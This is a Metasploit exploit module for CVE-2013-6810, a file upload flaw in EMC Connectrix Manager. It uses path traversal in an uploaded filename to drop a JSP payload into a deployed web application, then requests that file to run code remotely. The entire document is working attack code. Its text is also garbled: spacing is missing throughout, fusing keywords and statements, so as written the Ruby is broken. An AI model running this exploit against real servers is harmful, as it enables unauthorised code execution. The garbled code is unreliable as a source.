require 'msf/core'
classMetasploitModule<Msf::Exploit::RemoteRank=GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info ={})super(update_info(info,'Name'=> 'EMCCMCNEInmservlets.war FileUploadControllerRemoteCodeExecution',
'Description'=>%q{Thismoduleexploits a file upload vulnerability found in EMCConnectrixManagerConvergedNetworkEdition<=11.2.1.The file
upload vulnerability is triggered when sending a specially crafted
filename totheFileUploadController servlet found within the
Inmservlets.war archive. This allows the attacker toupload a
specially crafted file which leads toremote code execution in the
context of the server user.},'Author'=>[ 'james fitts' ],
'License'=>MSF_LICENSE,
'References' =>[['ZDI','13-280'],['CVE', '2013-6810' ]],
'Privileged' =>true,
'Platform' => 'win','Arch'=>ARCH_JAVA,
'Targets' =>[[ 'EMCCMCNE11.2.1/WindowsServer2003SP2 ',{}],],
'DefaultTarget'=>0,
'DisclosureDate' => 'Dec182013'))register_options([Opt::RPORT(80)], self.class)
end
def exploit
peer ="#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy ="..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/,"").gsub(/\x0a/,"")@jsp_name="#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
data =Rex::MIME::Message.new
data.add_part("#{jsp}", nil, nil,"form-data; name=\"ftproot\"; filename=\"#{deploy}#{@jsp_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/,"--_Part_")print_status("#{peer} - Uploading the JSP Payload...")
res =send_request_cgi({'method'=>'POST','uri'=>normalize_uri("inmservlets","FileUploadController"),'ctype'=>"multipart/form-data; boundary=#{data.bound}",'data'=> post_data,
'headers' =>{
'ROOTDIR' =>"ftproot"}})if res.code ==200 and res.body =~/SUCCESSFULLYUPLOADEDFILES!/print_good("File uploaded successfully!")print_status("Executing '#{@jsp_name}' now...")
res =send_request_cgi({'method'=>'GET','uri'=>normalize_uri("dcm-client","#{@jsp_name}")})elseprint_error("Does not look like the files were uploaded to #{peer}...")
end
end
end
